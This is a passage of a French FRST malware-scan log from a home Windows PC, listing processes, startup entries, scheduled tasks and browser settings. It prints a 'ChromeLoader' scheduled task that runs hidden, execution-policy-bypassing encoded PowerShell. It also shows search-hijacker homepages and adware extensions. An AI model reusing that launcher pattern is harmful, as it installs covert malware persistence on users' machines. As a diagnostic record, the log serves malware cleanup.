Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 10-04-2022 01 Exécuté par enzod (administrateur) sur DESKTOP-H3R3QO2 (Micro-Star International Co., Ltd. MS-7C51) (10-04-2022 15:23:52) Exécuté depuis C:\Users\enzod\OneDrive\Bureau Profils chargés: enzod Plate-forme: Microsoft Windows 10 Famille Version 21H1 19043.1586 (X64) Langue: Français (France) Navigateur par défaut: Opera Mode d'amorçage: Normal ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) C:\Program Files (x86)\Razer\Synapse3\UserProcess\Razer Synapse Service Process.exe (C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe (C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe (C:\Program Files\HuionTablet\HuionTablet.exe ->) (Shenzhen Huion Animation Technology Co.,LTD -> ) C:\Program Files\HuionTablet\HuionTabletCore.exe (C:\Program Files\HuionTablet\HuionTablet.exe ->) (Shenzhen Huion Animation Technology Co.,LTD -> TODO: <公司名>) C:\Program Files\HuionTablet\HuionServer.exe (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3> (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe (C:\Program Files\Zebra Technologies\Barcode Scanners\Common\CoreScanner.exe ->) (Zebra Technologies) [Fichier non signé] C:\Program Files\Zebra Technologies\Barcode Scanners\Common\HidKeyboardEmulator.exe (C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCopyAccelerator.exe (C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [Fichier non signé] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe (C:\Riot Games\Riot Client\RiotClientServices.exe ->) (Riot Games, Inc. -> Riot Games) C:\Riot Games\VALORANT\live\VALORANT.exe (C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe ->) (Riot Games, Inc. -> Epic Games, Inc.) C:\Riot Games\VALORANT\live\Engine\Binaries\Win64\UnrealCEFSubProcess.exe (C:\Riot Games\VALORANT\live\VALORANT.exe ->) (Riot Games, Inc. -> CN) C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe (C:\Users\enzod\AppData\Local\Programs\Opera GX\opera.exe ->) (Opera Software AS -> Opera Software) C:\Users\enzod\AppData\Local\Programs\Opera GX\85.0.4341.65\opera_crashreporter.exe (Discord Inc. -> Discord Inc.) C:\Users\enzod\AppData\Local\Discord\app-1.0.9004\Discord.exe <12> (explorer.exe ->) (Apple Inc.) C:\Program Files\WindowsApps\AppleInc.iTunes_12123.5.56009.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (explorer.exe ->) (Charles Milette) C:\Program Files\WindowsApps\28017CharlesMilette.TranslucentTB_2021.5.0.0_x64__v826wp6bftszj\TranslucentTB.exe (explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe (explorer.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.111.0_x86__97hta09mmv6hy\Build\Lively.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe (Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (Opera Software AS -> Opera Software) C:\Users\enzod\AppData\Local\Programs\Opera GX\opera.exe <20> (services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe (services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe (services.exe ->) (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd) C:\Program Files (x86)\MaskVPN\mask_svc.exe (services.exe ->) (HP Inc. -> HP Inc.) C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe (services.exe ->) (Logitech Inc -> Logitech) C:\Program Files\Logitech\LogiCapture\bin\Service\LogiFacecamService.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3> (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_c0e159863e7afdde\Display.NvContainer\NVDisplay.Container.exe <2> (services.exe ->) (Razer USA Ltd. -> Razer Inc) C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe (services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe (services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe (services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe (services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe (services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe (services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe <2> (services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe (services.exe ->) (Zebra Technologies) [Fichier non signé] C:\Program Files\Zebra Technologies\Barcode Scanners\Common\CoreScanner.exe (services.exe ->) (Zebra Technologies) [Fichier non signé] C:\Program Files\Zebra Technologies\Barcode Scanners\Common\RSMDriverProviderService.exe (services.exe ->) (Zebra Technologies) [Fichier non signé] C:\Program Files\Zebra Technologies\Barcode Scanners\Common\ScannerService.exe (Shenzhen Huion Animation Technology Co.,LTD -> ShenZhen Huion Animation Technology Co.Ltd.) C:\Program Files\HuionTablet\HuionTablet.exe (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2203.4603.0_x64__8wekyb3d8bbwe\Cortana.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Registre (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe [1361000 2021-09-27] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3183328 2022-03-12] (Riot Games, Inc. -> Riot Games, Inc.) HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare) HKLM-x32\...\Run: [RazerCortex] => C:\Program Files (x86)\Razer\Razer Cortex\CortexLauncher.exe [267072 2021-11-25] (Razer USA Ltd. -> Razer Inc.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [334896 2015-06-08] (Oracle America, Inc. -> Oracle Corporation) HKLM-x32\...\Run: [HuionTablet] => C:\Program Files\HuionTablet\HuionTablet.exe [1659888 2021-11-25] (Shenzhen Huion Animation Technology Co.,LTD -> ShenZhen Huion Animation Technology Co.Ltd.) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [781552 2022-03-30] (Adobe Inc. -> Adobe Inc.) HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> ) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33687520 2022-04-06] (Epic Games Inc. -> Epic Games, Inc.) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4279208 2022-03-14] (Valve Corp. -> Valve Corporation) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\enzod\AppData\Local\Microsoft\Teams\Update.exe [2459304 2021-12-28] (Microsoft 3rd Party Application Component -> Microsoft Corporation) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [Voicemod] => C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe [5782152 2021-04-06] (Voicemod Sociedad Limitada -> Voicemod) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> ) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524216 2021-11-18] (Razer USA Ltd. -> Razer Inc.) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [BakkesMod] => C:\Program Files\BakkesMod\BakkesMod.exe [16070656 2021-01-06] () [Fichier non signé] HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3146944 2022-03-31] (Electronic Arts, Inc. -> Electronic Arts) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\enzod\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\root\Office16\lync.exe [26456944 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-2718715299-2838987772-912226498-1001\...\Run: [Opera Browser Assistant] => C:\Users\enzod\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [4105424 2021-10-14] (Opera Software AS -> Opera Software) HKU\S-1-5-18\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524216 2021-11-18] (Razer USA Ltd. -> Razer Inc.) HKLM\...\Windows x64\Print Processors\Canon TS6000 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDE.DLL [30720 2017-12-18] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.) HKLM\...\Print\Monitors\Canon BJ Language Monitor TS6000 series: C:\Windows\system32\CNMLMDE.DLL [485376 2017-12-18] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\100.0.4896.75\Installer\chrmstp.exe [2022-04-05] (Google LLC -> Google LLC) HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION ==================== Tâches planifiées (Avec liste blanche) ============ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {099991BA-20BE-41C3-82B3-EEAE3AB7DB5B} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1656320 2022-01-28] (Nvidia Corporation -> NVIDIA Corporation) Task: {1B049DD4-715F-4760-B75C-F56C6363E30C} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-01-28] (Nvidia Corporation -> NVIDIA Corporation) Task: {1CA1AAE2-65A0-41B7-9577-3E71814A8D4C} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1009872 2021-11-02] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {1FB72081-73BD-4BA0-A83C-4CCDD47BCCCD} - System32\Tasks\Opera GX scheduled Autoupdate 1612973953 => C:\Users\enzod\AppData\Local\Programs\Opera GX\launcher.exe [2404096 2022-04-07] (Opera Software AS -> Opera Software) Task: {2857AA18-71E7-4A31-B896-4D0BFE2469AB} - System32\Tasks\MSI Task Host - MSI.True Color => C:\Program Files (x86)\MSI\One Dragon Center\True Color\MSI.True Color.exe (Pas de fichier) Task: {2F7FE6AE-E93C-43CC-9C84-CA42B6DF7F21} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {32C147C3-F0C9-4DED-B0D4-CDEB7A5B306E} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-01-28] (Nvidia Corporation -> NVIDIA Corporation) Task: {35E93C59-FD28-4D58-86D8-FD52C840E520} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1656320 2022-01-28] (Nvidia Corporation -> NVIDIA Corporation) Task: {3744ACED-E37A-4326-A943-D1E0B40D2AFD} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [138680 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) Task: {42D67B28-61E6-4EB7-B5CD-7F7DAA5C58DE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8338896 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) Task: {4C68050A-0D9C-4569-9F0F-706324D3802D} - System32\Tasks\BlueStacksHelper_nxt => C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe [275136 2021-12-22] (Bluestack Systems, Inc -> BlueStack Systems, Inc.) Task: {52724CA4-5FF2-4209-B935-08D7348EB26E} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB" Task: {598E72ED-F8B7-48AA-BC54-35D5BE7D3914} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {59B4B162-67AC-454A-9BE7-FB201B09778C} - System32\Tasks\Microsoft\Office\Office Performance Monitor => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe [61336 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) Task: {5B97177A-F783-48AC-9238-7D9D1248507A} - System32\Tasks\Opera scheduled assistant Autoupdate 1610657327 => C:\Users\enzod\AppData\Local\Programs\Opera\launcher.exe [2469120 2022-04-01] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\enzod\AppData\Local\Programs\Opera\assistant" $(Arg0) Task: {687B45E7-1BB1-46DE-B0D7-995B01C0F3AA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {70E9064D-C491-4C45-9D45-0F1CD61CB09C} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1616596624 => C:\Users\enzod\AppData\Local\Programs\Opera GX\launcher.exe [2404096 2022-04-07] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\enzod\AppData\Local\Programs\Opera GX\assistant" $(Arg0) Task: {9967A139-BA1F-4BE9-A5BF-8CFB1BD02D1B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-11-17] (Google LLC -> Google LLC) Task: {A5FEC095-87D1-44CB-9DB0-836825216038} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [138680 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) Task: {AA9E59AB-4F02-48D5-A4E8-C03F09A90041} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22865832 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) Task: {B13CD70B-85E9-4705-8670-B2AC52C62978} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKAAoAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAHgAdABQAGEAdABoACkAKQB7AAoACgAJACQAYQByAGMAa (l'élément de données a 1471 caractères en plus). <==== ATTENTION Task: {B6813F90-4E0D-4507-ABFE-C29FD420674F} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2718715299-2838987772-912226498-500 => C:\Users\enzod\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Pas de fichier) Task: {CCCCF552-5634-496F-A089-6F2336C67760} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3339472 2022-02-03] (Nvidia Corporation -> NVIDIA Corporation) Task: {D06FFBDD-14A4-4877-B89A-79670387C35D} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22865832 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) Task: {D847208E-8B0F-48DE-81BA-1921FD778BD9} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1656320 2022-01-28] (Nvidia Corporation -> NVIDIA Corporation) Task: {DEFAAB7C-4D20-4031-B24B-BDEC972CCB4F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8338896 2022-04-04] (Microsoft Corporation -> Microsoft Corporation) Task: {E4CF513B-C6F7-42A3-80AF-810A22886E06} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {EDCD1A95-E6F7-4751-8817-6C577279383E} - System32\Tasks\Opera scheduled Autoupdate 1610657325 => C:\Users\enzod\AppData\Local\Programs\Opera\launcher.exe [2469120 2022-04-01] (Opera Software AS -> Opera Software) Task: {F2B1F762-E06C-476D-A897-7B472653D475} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-11-17] (Google LLC -> Google LLC) Task: {F6E13F0B-5A09-4E76-AED3-710C52D80FC0} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1656320 2022-01-28] (Nvidia Corporation -> NVIDIA Corporation) Task: {FBB0CB22-2821-43D3-98FD-0109F32CE390} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [647376 2022-01-28] (Nvidia Corporation -> NVIDIA Corporation) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc. -> Apple Inc.) Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [132968 2011-08-31] (Apple Inc. -> Apple Inc.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{047132a3-3479-4520-b56b-d003335b167a}: [NameServer] 8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{047132a3-3479-4520-b56b-d003335b167a}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{5bfc6909-7594-48a2-8c28-802fbf5a68b9}: [DhcpNameServer] 192.168.120.250 Tcpip\..\Interfaces\{8511c3e8-e84c-4d78-a635-8d91abd70602}: [DhcpNameServer] 172.20.10.1 Tcpip\..\Interfaces\{8e92d4ff-d9fc-4960-9b51-d60551ef9227}: [DhcpNameServer] 192.168.120.250 Tcpip\..\Interfaces\{9b184dd8-fa5f-4d06-8888-71d5d6592294}: [DhcpNameServer] 192.168.120.250 Tcpip\..\Interfaces\{e1f97596-a72e-454f-8cee-2840a104aef7}: [DhcpNameServer] 192.168.120.250 Edge: ======= Edge HomeButtonPage: HKU\S-1-5-21-2718715299-2838987772-912226498-1001 -> hxxps://www.yandex.ru/?win=463&clid=2341035-18 Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)] Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)] Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)] Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)] Edge Profile: C:\Users\enzod\AppData\Local\Microsoft\Edge\User Data\Default [2022-03-31] FireFox: ======== FF DefaultProfile: 7y7cfhjd.default FF ProfilePath: C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\7y7cfhjd.default [2021-02-20] FF Homepage: Mozilla\Firefox\Profiles\7y7cfhjd.default -> hxxps://mysearchengine.co/homepage?hp=1&bitmask=9996&pId=IC150206&iDate=2020-10-02 04:42:38&bName= FF NewTab: Mozilla\Firefox\Profiles\7y7cfhjd.default -> hxxps://mysearchengine.co/homepage?hp=1&bitmask=9996&pId=IC150206&iDate=2020-10-02 04:42:38&bName= FF SearchPlugin: C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\7y7cfhjd.default\searchplugins\mysearchengine.xml [2020-11-22] FF ProfilePath: C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764 [2022-02-09] FF Homepage: Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764 -> hxxps://mysearchengine.co/homepage?hp=1&bitmask=9996&pId=IC150206&iDate=2020-10-02 04:42:38&bName= FF NewTab: Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764 -> hxxps://mysearchengine.co/homepage?hp=1&bitmask=9996&pId=IC150206&iDate=2020-10-02 04:42:38&bName= FF Notifications: Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764 -> hxxps://www.backmarket.fr; hxxps://0.nextyourcontent.com FF Extension: (Coupert - Codes Promo Automatiques & Cashback) - C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764\Extensions\appledev@soarinfotech.com.xpi [2020-09-26] [UpdateUrl:hxxps://www.coupert.com/api/v2/extension/ffupdate] FF Extension: (Speed test rapide) - C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764\Extensions\{0f67da6e-60e8-4fcf-8a50-9441ccabc9cd}.xpi [2020-10-18] FF Extension: (Music Finder Powered by Yahoo) - C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764\Extensions\{39790485-930b-40a5-8268-69222363ff80}.xpi [2020-10-06] [UpdateUrl:hxxps://addons.themusicfinder.net/mfff/updates.json] FF Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2020-10-14] FF SearchPlugin: C:\Users\enzod\AppData\Roaming\Mozilla\Firefox\Profiles\swmpgk8h.default-release-1600426390764\searchplugins\My Bing Search.xml [2021-02-20] FF Plugin: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2021-06-15] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2021-06-15] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-04-04] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-03-30] (Adobe Inc. -> Adobe Systems) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-03-05] (Microsoft Corporation -> Microsoft Corporation) FF 